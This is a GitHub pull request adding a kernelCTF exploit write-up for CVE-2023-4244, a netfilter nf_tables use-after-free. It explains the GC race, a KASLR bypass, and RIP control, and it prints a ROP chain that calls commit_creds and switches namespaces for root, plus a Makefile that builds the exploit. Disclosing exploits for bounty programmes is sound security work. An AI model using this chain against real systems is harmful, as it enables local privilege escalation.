Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add kernelCTF CVE-2023-4244_mitigation #161

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
270 changes: 270 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,270 @@
# Overview

The vulnerability is caused by a race condition between the control plane and GC.

```c
static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set)
{
int err;

err = nft_trans_set_add(ctx, NFT_MSG_DELSET, set);
if (err < 0)
return err;

if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
nft_map_deactivate(ctx, set); // [1]

nft_deactivate_next(ctx->net, set);
nft_use_dec(&ctx->table->use);

return err;
}
```

Deleting an nft_set deactivates the set element in the `nft_delset` [1].

```c
static void nft_rbtree_gc(struct work_struct *work)
{
struct nft_rbtree_elem *rbe, *rbe_end = NULL, *rbe_prev = NULL;
struct nft_set_gc_batch *gcb = NULL;
struct nft_rbtree *priv;
struct rb_node *node;
struct nft_set *set;
struct net *net;
u8 genmask;

priv = container_of(work, struct nft_rbtree, gc_work.work);
set = nft_set_container_of(priv);
net = read_pnet(&set->net);
genmask = nft_genmask_cur(net);

write_lock_bh(&priv->lock);
write_seqcount_begin(&priv->count);
for (node = rb_first(&priv->root); node != NULL; node = rb_next(node)) {
rbe = rb_entry(node, struct nft_rbtree_elem, node);

if (!nft_set_elem_active(&rbe->ext, genmask))
continue;

/* elements are reversed in the rbtree for historical reasons,
* from highest to lowest value, that is why end element is
* always visited before the start element.
*/
if (nft_rbtree_interval_end(rbe)) {
rbe_end = rbe;
continue;
}
if (!nft_set_elem_expired(&rbe->ext))
continue;

if (nft_set_elem_mark_busy(&rbe->ext)) {
rbe_end = NULL;
continue;
}

if (rbe_prev) {
rb_erase(&rbe_prev->node, &priv->root);
rbe_prev = NULL;
}
gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC);
if (!gcb)
break;

atomic_dec(&set->nelems);
nft_set_gc_batch_add(gcb, rbe); // [2]
rbe_prev = rbe;

if (rbe_end) {
atomic_dec(&set->nelems);
nft_set_gc_batch_add(gcb, rbe_end);
rb_erase(&rbe_end->node, &priv->root);
rbe_end = NULL;
}
node = rb_next(node);
if (!node)
break;
}
if (rbe_prev)
rb_erase(&rbe_prev->node, &priv->root);
write_seqcount_end(&priv->count);
write_unlock_bh(&priv->lock);

rbe = nft_set_catchall_gc(set);
if (rbe) {
gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC);
if (gcb)
nft_set_gc_batch_add(gcb, rbe);
}
nft_set_gc_batch_complete(gcb); // [3]

queue_delayed_work(system_power_efficient_wq, &priv->gc_work,
nft_set_gc_interval(set));
}
```

If the set's GC function, `nft_rbtree_gc`, is called at the same time, it will add the expired elements to the GC batch [2]. It then calls `nft_set_gc_batch_complete` to release this element [3]. As a result, the deactivated element is once again deactiavted in the GC, leading to the vulnerability.

We can trigger a UAF from this vulnerability as follows. First, create a victim set and a victim chain, and create an immediate expr pointing to the victim chain to create a dangling pointer. At this point, the victim chain's reference count (`nft_chain->use`) is set to 1. Then, we add a set element which is configured short timeout to this victim set that points to the victim chain. Now, the reference count of the victim chain becomes 2. Next, we delete the set to trigger the vulnerability. When the vulnerability is triggered, the victim chain's reference count is decremented twice to zero. Since the reference count of the victim chain is zero, the chain can be free. As a result, the victim chain is left as a dangling pointer in the immediate expr.

# KASLR Bypass and Information Leak

We used a timing side channel attack to leak the kernel base, and created a fake ops in the non-randomized CPU entry area (CVE-2023-0597) without leaking the heap address.

# RIP Control

```c
struct nft_chain {
struct nft_rule_blob __rcu *blob_gen_0;
struct nft_rule_blob __rcu *blob_gen_1;
struct list_head rules;
struct list_head list;
struct rhlist_head rhlhead;
struct nft_table *table;
u64 handle;
u32 use;
u8 flags:5,
bound:1,
genmask:2;
char *name;
u16 udlen;
u8 *udata;

/* Only used during control plane commit phase: */
struct nft_rule_blob *blob_next;
};
```

When the vulnerability is triggered, the freed `chain->blob_gen_0` can be accessed via `immediate expr`. We leave the chain freed and spray an object to create a fake blob in `blob_gen_0`.

```c
unsigned int
nft_do_chain(struct nft_pktinfo *pkt, void *priv)
{
...
do_chain:
if (genbit)
blob = rcu_dereference(chain->blob_gen_1);
else
blob = rcu_dereference(chain->blob_gen_0);

rule = (struct nft_rule_dp *)blob->data;
last_rule = (void *)blob->data + blob->size;
next_rule:
regs.verdict.code = NFT_CONTINUE;
for (; rule < last_rule; rule = nft_rule_next(rule)) {
nft_rule_dp_for_each_expr(expr, last, rule) {
if (expr->ops == &nft_cmp_fast_ops)
nft_cmp_fast_eval(expr, &regs);
else if (expr->ops == &nft_cmp16_fast_ops)
nft_cmp16_fast_eval(expr, &regs);
else if (expr->ops == &nft_bitwise_fast_ops)
nft_bitwise_fast_eval(expr, &regs);
else if (expr->ops != &nft_payload_fast_ops ||
!nft_payload_fast_eval(expr, &regs, pkt))
expr_call_ops_eval(expr, &regs, pkt);

if (regs.verdict.code != NFT_CONTINUE)
break;
}
```

```c
static void expr_call_ops_eval(const struct nft_expr *expr,
struct nft_regs *regs,
struct nft_pktinfo *pkt)
{
#ifdef CONFIG_RETPOLINE
unsigned long e = (unsigned long)expr->ops->eval;
#define X(e, fun) \
do { if ((e) == (unsigned long)(fun)) \
return fun(expr, regs, pkt); } while (0)

X(e, nft_payload_eval);
X(e, nft_cmp_eval);
X(e, nft_counter_eval);
X(e, nft_meta_get_eval);
X(e, nft_lookup_eval);
X(e, nft_range_eval);
X(e, nft_immediate_eval);
X(e, nft_byteorder_eval);
X(e, nft_dynset_eval);
X(e, nft_rt_get_eval);
X(e, nft_bitwise_eval);
#undef X
#endif /* CONFIG_RETPOLINE */
expr->ops->eval(expr, regs, pkt);
}
```

`chain->blob_gen_0` is used in `nft_do_chain`, and `expr->ops->eval` is called to evaluate the expression in `expr_call_ops_eval`. We set the ops of the fake expr to the CPU entry area to control the RIP. We allocate the fake blob object larger than 0x2000 to use page allocator.

# Post-RIP

The ROP payload is stored in `chain->blob_gen_0` which is allocated by page allocator.

When `eval()` is called, `RBX` points to `chain->blob_gen_0+0x10`, which is the beginning of the `nft_expr` structure.

```c
void rop_chain(uint64_t* data){
int i = 0;

// nft_rule_blob.size > 0
data[i++] = 0x100;
// nft_rule_blob.dlen > 0
data[i++] = 0x100;

// fake ops addr
data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval);

// current = find_task_by_vpid(getpid())
data[i++] = kbase + POP_RDI_RET;
data[i++] = getpid();
data[i++] = kbase + FIND_TASK_BY_VPID;

// current += offsetof(struct task_struct, rcu_read_lock_nesting)
data[i++] = kbase + POP_RSI_RET;
data[i++] = RCU_READ_LOCK_NESTING_OFF;
data[i++] = kbase + ADD_RAX_RSI_RET;

// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
data[i++] = kbase + POP_RCX_RET;
data[i++] = 0;
data[i++] = kbase + MOV_RAX_RCX_RET;

// Bypass "schedule while atomic": set oops_in_progress = 1
data[i++] = kbase + POP_RDI_RET;
data[i++] = 1;
data[i++] = kbase + POP_RSI_RET;
data[i++] = kbase + OOPS_IN_PROGRESS;
data[i++] = kbase + MOV_RSI_RDI_RET;

// commit_creds(&init_cred)
data[i++] = kbase + POP_RDI_RET;
data[i++] = kbase + INIT_CRED;
data[i++] = kbase + COMMIT_CREDS;

// find_task_by_vpid(1)
data[i++] = kbase + POP_RDI_RET;
data[i++] = 1;
data[i++] = kbase + FIND_TASK_BY_VPID;

data[i++] = kbase + POP_RSI_RET;
data[i++] = 0;

// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
data[i++] = kbase + MOV_RDI_RAX_RET;
data[i++] = kbase + POP_RSI_RET;
data[i++] = kbase + INIT_NSPROXY;
data[i++] = kbase + SWITCH_TASK_NAMESPACES;

data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
data[i++] = 0;
data[i++] = 0;
data[i++] = _user_rip;
data[i++] = _user_cs;
data[i++] = _user_rflags;
data[i++] = _user_sp;
data[i++] = _user_ss;
}
```
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
- Requirements:
- Capabilities: CAP_NET_ADMIN
- Kernel configuration: CONFIG_NETFILTER, CONFIG_NF_TABLES
- User namespaces required: Yes
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cfed7e1b1f8e (netfilter: nf_tables: add set garbage collection helpers)
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5f68718b34a531a556f2f50300ead2862278da26 (netfilter: nf_tables: GC transaction API to avoid race with control plane)
- Affected Version: v6.4 - v6.5-rc5
- Affected Component: net/netfilter
- Cause: Use-After-Free
- Syscall to disable: disallow unprivileged username space
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-4244
- Description: A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. Due to a race condition between nf_tables netlink control plane transaction and nft_set element garbage collection, it is possible to underflow the reference counter causing a use-after-free vulnerability. We recommend upgrading past commit 3e91b0ebd994635df2346353322ac51ce84ce6d8.
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
LIBMNL_DIR = $(realpath ./)/libmnl_build
LIBNFTNL_DIR = $(realpath ./)/libnftnl_build

exploit:
gcc -o exploit exploit.c -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include -static -s

prerequisites: libmnl-build libnftnl-build

libmnl-build : libmnl-download
tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install

libnftnl-build : libmnl-build libnftnl-download
tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install`
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install

libmnl-download :
mkdir $(LIBMNL_DIR)
wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2

libnftnl-download :
mkdir $(LIBNFTNL_DIR)
wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz

run:
./exploit

clean:
rm -rf $(LIBMNL_DIR)
rm -rf $(LIBNFTNL_DIR)
rm -f exploit
Binary file not shown.
Loading
Loading